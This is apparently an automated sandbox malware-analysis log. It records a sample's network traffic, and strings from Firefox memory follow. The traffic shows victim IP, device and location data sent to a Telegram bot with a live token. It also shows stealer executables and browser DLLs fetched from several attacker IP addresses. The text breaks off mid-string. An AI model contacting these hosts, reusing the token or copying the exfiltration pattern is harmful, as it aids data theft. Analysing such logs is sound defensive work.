Source: global traffic	HTTP traffic detected: GET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20921702%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1User-Agent: TelegramBotHost: api.telegram.orgCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/7427009775/dwVrTdy.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/7427009775/AzVRM7c.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/7427009775/t5abhIx.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/8199790517/u1w30Wt.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /ctx.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /fcxcx.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Source: global traffic	HTTP traffic detected: GET /vvv.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11If-Modified-Since: Wed, 11 Dec 2024 08:22:24 GMTIf-None-Match: "67594bc0-b1a00"
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/encoxx/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/hell911/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: dHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: sHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache

Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://pixel.advertising.com/firefox-etp://pubads.g.doubleclick.net/gampad/ad-blk://www.facebook.com/platform/impression.phphttps://ads.stickyadstv.com/firefox-etp://.adsafeprotected.com//unit/extensions.webextensions.warnings-as-errors equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://www.facebook.com/platform/impression.php equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002C.00000002.2679783197.00000144AEAE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Failed to listen. Callback argument missing.releaseDistinctSystemPrincipalLoaderFailed to execute WebChannel callback:DevTools telemetry entry point failed: ^[a-z0-9-]+(\.[a-z0-9-]+):[0-9]{1,5}([/?#]\|$)^([a-z][a-z0-9.+\t-])(:\|;)?(\/\/)?Got invalid request to save JSON dataJSON Viewer's onSave failed in startPersistenceFailed to listen. Listener already attached.@mozilla.org/network/protocol;1?name=filedevtools/client/framework/devtools@mozilla.org/uriloader/handler-service;1devtools.debugger.remote-websocket{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}browser.fixup.domainsuffixwhitelist.get FIXUP_FLAGS_MAKE_ALTERNATE_URI^(?<url>\w+:.+):(?<line>\d+):(?<column>\d+)$@mozilla.org/network/protocol;1?name=defaultdevtools.performance.recording.ui-base-urlresource://devtools/server/devtools-server.jsNo callback set for this channel.devtools.performance.popup.feature-flagUnable to start devtools server on devtools/client/framework/devtools-browserWebChannel/this._originCheckCallbackbrowser.fixup.dns_first_for_single_wordsbrowser.urlbar.dnsResolveFullyQualifiedNames^([a-z+.-]+:\/{0,3})*([^\/@]+@).+DevToolsStartup.jsm:handleDebuggerFlagresource://devtools/shared/security/socket.jsget FIXUP_FLAG_ALLOW_KEYWORD_LOOKUP@mozilla.org/dom/slow-script-debug;1isDownloadsImprovementsAlreadyMigratedhttps://mail.inbox.lv/compose?to=%sresource://gre/modules/FileUtils.sys.mjs{c6cf88b7-452e-47eb-bdc9-86e3561648ef}extractScheme/fixupChangedProtocol<http://poczta.interia.pl/mh/?mailto=%shttp://win.mail.ru/cgi-bin/sentmsg?mailto=%shttp://www.inbox.lv/rfc2368/?value=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%shttps://poczta.interia.pl/mh/?mailto=%s@mozilla.org/uriloader/local-handler-app;1resource://gre/modules/FileUtils.sys.mjs@mozilla.org/uriloader/web-handler-app;1gecko.handlerService.defaultHandlersVersionhandlerSvc fillHandlerInfo: don't know this typeresource://gre/modules/DeferredTask.sys.mjshttps://mail.yahoo.co.jp/compose/?To=%s@mozilla.org/uriloader/dbus-handler-app;1resource://gre/modules/NetUtil.sys.mjs@mozilla.org/network/file-input-stream;1_finalizeInternal/this._finalizePromise<_injectDefaultProtocolHandlersIfNeededhttp://compose.mail.yahoo.co.jp/ym/Compose?To=%sresource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/JSONFile.sys.mjsresource://gre/modules/ExtHandlerService.sys.mjsresource://gre/modules/URIFixup.sys.mjsCan't invoke URIFixup in the content process{33d75835-722f-42c0-89cc-44f328e56a86}resource://gre/modules/JSONFile.sys.mjsget FIXUP_FLAG_FORCE_ALTERNATE_URIScheme should be either http or httpsnewChannel requires a single object argumentSEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULLNon-zero amount of bytes must be specifiedMust have a source and a callback@mozilla.org/scriptableinputstream;1https://mail.yahoo.co.jp/compose/?To=%shttps://mail.yandex.ru/compose?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%shttps://mail.inbox.lv/compose?to=%sFirst argument should be an nsIInputStreamhttps://poczta.interia.pl/mh/?mailto=%spdfjs.previousHandler.p
Source: firefox.exe, 0000002C.00000002.2681975606.00000144AEC08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002C.00000002.2681975606.00000144AEC08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", 